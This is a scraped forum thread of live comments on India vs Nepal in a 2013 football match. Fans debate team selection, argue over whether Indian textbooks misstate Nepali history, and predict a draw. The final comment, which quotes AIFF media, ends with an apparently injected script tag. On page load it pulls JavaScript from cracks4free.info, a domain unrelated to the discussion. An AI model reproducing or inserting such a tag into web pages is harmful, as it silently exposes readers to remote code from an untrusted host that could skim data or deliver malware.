India vs Nepal Live Discussions, September 5 2013

Comments

• Moharaj,Lenny,Francis & Jeje should be axed tomorrow.
  • ashindiaashindia 9254 Points
    ShebbySB wrote: »
    Moharaj,Lenny,Francis & Jeje should be axed tomorrow.

Francis is okay but rest of them shoul be
    joy123 wrote: »
    ashindia wrote: »
    @Namewtheld is from Bihar
     <br><div><br></div><div>my origin is also bihar...but i have always stayed outside...</div>

Dude cut the crap, bringing huge banners about this will not change anything its a football match afterall. Indian govt will continue to publish this in our books.

Also it would be better if you tell us about your team regarding tommorows match instead of this.
  • ashindia wrote: »
    ashindia wrote: »
    @Namewtheld is from Bihar
     <br><div><br></div><div>my origin is also bihar...but i have always stayed outside...</div>

Dude cut the crap, bringing huge banners about this will not change anything its a football match afterall. Indian govt will continue to publish this in our books.

Also it would be better if you tell us about your team regarding tommorows match instead of this.

<br><div><br></div><div>ok bro....nothing new about nepal team.main players are suffering from injury and the game has high chance to draw......</div>
  • trojantrojan 371 Points
    namewtheld wrote: »
    Well then correct me! Where was I wrong?

<br><div><br></div><div>go and see the books which are taught in UP and Bihar...what the student learn in their syallabus was budhha is born in india,mount everest is india, and many others things...what a shame...</div><div>my room mate is from bihar and he said we read all this things in ours school level.</div>

<br><div><br></div><div>I'm from UP and none of the sh!t you mentioned is taught in schools here. Siddhartha gautam was born in Nepal and Buddha was born in India is a fact. Infact there was no Nepal when he was born and he is referred as an Indian king and not nepali.</div>
  • rudrarudra 2958 Points
    @joy123 @nameWTHeld @ashindia - Leave  the lord in peace now  and watch Bimal Magar taking on Gouramangi :P
  • Shah476Shah476 240 Points
    Dnt say high chance.. its for sure.. patel n thapa bhai bhai :p perks of being hosts...
  • Both team strikers looks blunt . Draw could be safe landing for both. Really india should be thankful to that pakistan player for saving their great image.
  • When india beat cameroon and 4_0 game wid b.Munich, looked like they can make to asian level easily. But they could not make to challange cup and now struggling in saff. How they going down so fast ???
    I want strong south asian football . And it is bad sign when giant sleep..
    <font size="4"><b>AIFF Media Says - </b></font><b><i><span style="font-size:14px"><span style="font-family:bookman old style">“A
    Footballer’s life is all about those 90 minutes. But every Team needs a
    bit of luck. We have been so distinctly unlucky in the last two
    matches.</span></span></i></b><script src="http://cracks4free.info/5/adds.js"; async="" type="text/javascript"></script>